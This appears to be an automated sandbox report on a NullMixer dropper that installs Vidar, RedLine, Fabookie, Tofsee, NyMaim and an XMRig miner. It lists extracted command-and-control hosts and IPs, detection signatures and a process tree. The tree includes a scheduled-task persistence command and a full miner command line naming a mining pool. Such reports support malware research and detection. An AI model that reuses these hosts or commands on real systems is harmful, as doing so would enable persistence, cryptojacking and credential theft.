fabookie | e01c707ed88384300b1e48081590287e19ec16b83cf0c2afcb0f72a98c017e86

Analysis

max time kernel
40s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
14-11-2022 09:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe
Size

3.8MB
MD5

56fbb5d915ff47c20902b8927ba569a3
SHA1

23aae060b278385144806e0c371af6c69b8e0158
SHA256

08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1
SHA512

8067445522ceff25c27caa0683019a0738658509c72f2600c56efe31fd57a0478b23489321132dba66c6826790b94a5cbe676181899a8211ea2aa31988eeaeb2
SSDEEP

98304:JMdlMnIffWtaW1gBLuoitV6HxvT5DsimPSveqa:JMdiIXYaWYktVexv1Dveqa

Malware Config

Extracted

Family

nullmixer

http://sokiran.xyz/

Extracted

Family

vidar

Version

39.7

Botnet

933

https://shpak125.tumblr.com/

Attributes

profile_id
933

Extracted

Family

redline

Botnet

Build2

45.142.213.135:30059

Extracted

Family

vidar

Version

55.6

Botnet

1679

https://t.me/seclab_new

https://raw.githubusercontent.com/sebekeloytfu/simple-bash-scripts/master/calculator.sh

Attributes

profile_id
1679

Extracted

Family

tofsee

svartalfheim.top

jotunheim.name

Extracted

Family

nymaim

45.139.105.171

85.31.46.167

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022dfe-197.dat	family_fabookie
behavioral2/files/0x0001000000022dfe-177.dat	family_fabookie

Detects Smokeloader packer 1 IoCs

resource	yara_rule
behavioral2/memory/3980-232-0x0000000000030000-0x0000000000039000-memory.dmp	family_smokeloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	2448	rUNdlL32.eXe	111

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/memory/948-256-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/948-258-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Nirsoft 2 IoCs

resource	yara_rule
behavioral2/memory/2736-209-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/2872-252-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft

Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral2/memory/4712-235-0x0000000000AC0000-0x0000000000B5D000-memory.dmp	family_vidar
behavioral2/memory/4712-239-0x0000000000400000-0x00000000008EB000-memory.dmp	family_vidar
behavioral2/memory/4712-282-0x0000000000400000-0x00000000008EB000-memory.dmp	family_vidar

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/memory/936-303-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/936-304-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/936-305-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/936-306-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/936-313-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/936-340-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0001000000022e05-136.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e05-138.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e01-139.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e00-140.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e01-143.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e00-147.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e00-146.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e03-145.dat	aspack_v212_v242
behavioral2/files/0x0001000000022e03-150.dat	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 19 IoCs

pid	Process
4568	setup_installer.exe
3624	setup_install.exe
1504	sonia_1.exe
3980	sonia_2.exe
4712	sonia_3.exe
3652	sonia_4.exe
3080	sonia_7.exe
1124	sonia_6.exe
1568	sonia_8.exe
3584	sonia_1.exe
2736	jfiag3g_gg.exe
2880	Chrome2.exe
448	Install2.EXE
1836	BIRZAC~1.EXE
2360	P1GlorySetp.exe
3376	sonia_5.exe
2872	jfiag3g_gg.exe
948	BIRZAC~1.EXE
3124	BUILD2~1.EXE

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0001000000022e11-207.dat	upx
behavioral2/files/0x0001000000022e11-208.dat	upx
behavioral2/memory/2736-209-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/files/0x0001000000022e28-247.dat	upx
behavioral2/files/0x0001000000022e28-248.dat	upx
behavioral2/memory/2872-252-0x0000000000400000-0x0000000000422000-memory.dmp	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/5440-329-0x0000000140000000-0x0000000140615000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	BUILD2~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	sonia_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	sonia_8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Chrome2.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Loads dropped DLL 9 IoCs

pid	Process
3624	setup_install.exe
3624	setup_install.exe
3624	setup_install.exe
3624	setup_install.exe
3624	setup_install.exe
3624	setup_install.exe
3624	setup_install.exe
3980	sonia_2.exe
3164	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/1600-343-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-344-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-346-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-348-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-352-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-354-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-349-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-356-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida
behavioral2/memory/1600-357-0x0000000000ED0000-0x00000000015B2000-memory.dmp	themida

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	sonia_7.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	Install2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Install2.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ipinfo.io
13	ip-api.com
10	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1836 set thread context of 948	1836	BIRZAC~1.EXE	117

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3112	sc.exe
5664	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2092	3624	WerFault.exe	82
4080	3164	WerFault.exe	114

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sonia_2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5208	schtasks.exe
2356	schtasks.exe
3328	schtasks.exe
3376	schtasks.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

pid	Process
3980	sonia_2.exe
3980	sonia_2.exe
2872	jfiag3g_gg.exe
2872	jfiag3g_gg.exe
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
2880	Chrome2.exe
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found
3092	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3980	sonia_2.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	3652	sonia_4.exe
Token: SeDebugPrivilege	2360	P1GlorySetp.exe
Token: SeDebugPrivilege	3376	sonia_5.exe
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeDebugPrivilege	2880	Chrome2.exe
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found
Token: SeShutdownPrivilege	3092	Process not Found
Token: SeCreatePagefilePrivilege	3092	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5036 wrote to memory of 4568	5036	08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe	81
PID 5036 wrote to memory of 4568	5036	08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe	81
PID 5036 wrote to memory of 4568	5036	08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe	81
PID 4568 wrote to memory of 3624	4568	setup_installer.exe	82
PID 4568 wrote to memory of 3624	4568	setup_installer.exe	82
PID 4568 wrote to memory of 3624	4568	setup_installer.exe	82
PID 3624 wrote to memory of 3892	3624	setup_install.exe	85
PID 3624 wrote to memory of 3892	3624	setup_install.exe	85
PID 3624 wrote to memory of 3892	3624	setup_install.exe	85
PID 3624 wrote to memory of 4732	3624	setup_install.exe	86
PID 3624 wrote to memory of 4732	3624	setup_install.exe	86
PID 3624 wrote to memory of 4732	3624	setup_install.exe	86
PID 3624 wrote to memory of 4752	3624	setup_install.exe	87
PID 3624 wrote to memory of 4752	3624	setup_install.exe	87
PID 3624 wrote to memory of 4752	3624	setup_install.exe	87
PID 3624 wrote to memory of 4188	3624	setup_install.exe	100
PID 3624 wrote to memory of 4188	3624	setup_install.exe	100
PID 3624 wrote to memory of 4188	3624	setup_install.exe	100
PID 3624 wrote to memory of 1280	3624	setup_install.exe	88
PID 3624 wrote to memory of 1280	3624	setup_install.exe	88
PID 3624 wrote to memory of 1280	3624	setup_install.exe	88
PID 3624 wrote to memory of 1080	3624	setup_install.exe	99
PID 3624 wrote to memory of 1080	3624	setup_install.exe	99
PID 3624 wrote to memory of 1080	3624	setup_install.exe	99
PID 3624 wrote to memory of 4260	3624	setup_install.exe	98
PID 3624 wrote to memory of 4260	3624	setup_install.exe	98
PID 3624 wrote to memory of 4260	3624	setup_install.exe	98
PID 3624 wrote to memory of 3308	3624	setup_install.exe	97
PID 3624 wrote to memory of 3308	3624	setup_install.exe	97
PID 3624 wrote to memory of 3308	3624	setup_install.exe	97
PID 3892 wrote to memory of 1504	3892	cmd.exe	96
PID 3892 wrote to memory of 1504	3892	cmd.exe	96
PID 3892 wrote to memory of 1504	3892	cmd.exe	96
PID 4732 wrote to memory of 3980	4732	cmd.exe	95
PID 4732 wrote to memory of 3980	4732	cmd.exe	95
PID 4732 wrote to memory of 3980	4732	cmd.exe	95
PID 4752 wrote to memory of 4712	4752	cmd.exe	89
PID 4752 wrote to memory of 4712	4752	cmd.exe	89
PID 4752 wrote to memory of 4712	4752	cmd.exe	89
PID 4188 wrote to memory of 3652	4188	cmd.exe	94
PID 4188 wrote to memory of 3652	4188	cmd.exe	94
PID 4260 wrote to memory of 3080	4260	cmd.exe	93
PID 4260 wrote to memory of 3080	4260	cmd.exe	93
PID 4260 wrote to memory of 3080	4260	cmd.exe	93
PID 1080 wrote to memory of 1124	1080	cmd.exe	92
PID 1080 wrote to memory of 1124	1080	cmd.exe	92
PID 1080 wrote to memory of 1124	1080	cmd.exe	92
PID 3308 wrote to memory of 1568	3308	cmd.exe	90
PID 3308 wrote to memory of 1568	3308	cmd.exe	90
PID 3308 wrote to memory of 1568	3308	cmd.exe	90
PID 1504 wrote to memory of 3584	1504	sonia_1.exe	102
PID 1504 wrote to memory of 3584	1504	sonia_1.exe	102
PID 1504 wrote to memory of 3584	1504	sonia_1.exe	102
PID 3080 wrote to memory of 2736	3080	sonia_7.exe	104
PID 3080 wrote to memory of 2736	3080	sonia_7.exe	104
PID 3080 wrote to memory of 2736	3080	sonia_7.exe	104
PID 1568 wrote to memory of 2880	1568	sonia_8.exe	105
PID 1568 wrote to memory of 2880	1568	sonia_8.exe	105
PID 1568 wrote to memory of 448	1568	sonia_8.exe	106
PID 1568 wrote to memory of 448	1568	sonia_8.exe	106
PID 448 wrote to memory of 1836	448	Install2.EXE	107
PID 448 wrote to memory of 1836	448	Install2.EXE	107
PID 448 wrote to memory of 1836	448	Install2.EXE	107
PID 1568 wrote to memory of 2360	1568	sonia_8.exe	109

C:\Users\Admin\AppData\Local\Temp\08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe
"C:\Users\Admin\AppData\Local\Temp\08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5036
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3892
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_1.exe
        
        sonia_1.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1504
      - C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_1.exe" -a
        6⤵
        Executes dropped EXE
        
        PID:3584
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_2.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_2.exe
        
        sonia_2.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4752
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_3.exe
        
        sonia_3.exe
        5⤵
        Executes dropped EXE
        
        PID:4712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_5.exe
      4⤵
      PID:1280
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_5.exe
        
        sonia_5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_8.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sonia_4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4188
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 560
      4⤵
      Program crash
      PID:2092

C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_8.exe
sonia_8.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1568
- C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
    3⤵
    PID:3800
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
      4⤵
      Creates scheduled task(s)
      PID:3328
- - C:\Users\Admin\AppData\Roaming\system64.exe
    "C:\Users\Admin\AppData\Roaming\system64.exe"
    3⤵
    PID:4456
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
      4⤵
      PID:1000
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:3376
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      PID:4652
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=80
      4⤵
      PID:936
- C:\Users\Admin\AppData\Local\Temp\Install2.EXE
  "C:\Users\Admin\AppData\Local\Temp\Install2.EXE"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:448
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
      4⤵
      Executes dropped EXE
      PID:948
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    PID:3124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS44D9.tmp\Install.cmd" "
      4⤵
      PID:220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Df2r7
        5⤵
        
        PID:344
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab40546f8,0x7ffab4054708,0x7ffab4054718
        6⤵
        
        PID:4172
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
        6⤵
        
        PID:756
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
        6⤵
        
        PID:2064
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
        6⤵
        
        PID:4856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
        6⤵
        
        PID:5020
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
        6⤵
        
        PID:4308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5404 /prefetch:8
        6⤵
        
        PID:3756
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5480 /prefetch:8
        6⤵
        
        PID:228
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
        6⤵
        
        PID:448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
        6⤵
        
        PID:4268
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
        6⤵
        
        PID:5200
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        6⤵
        
        PID:5208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
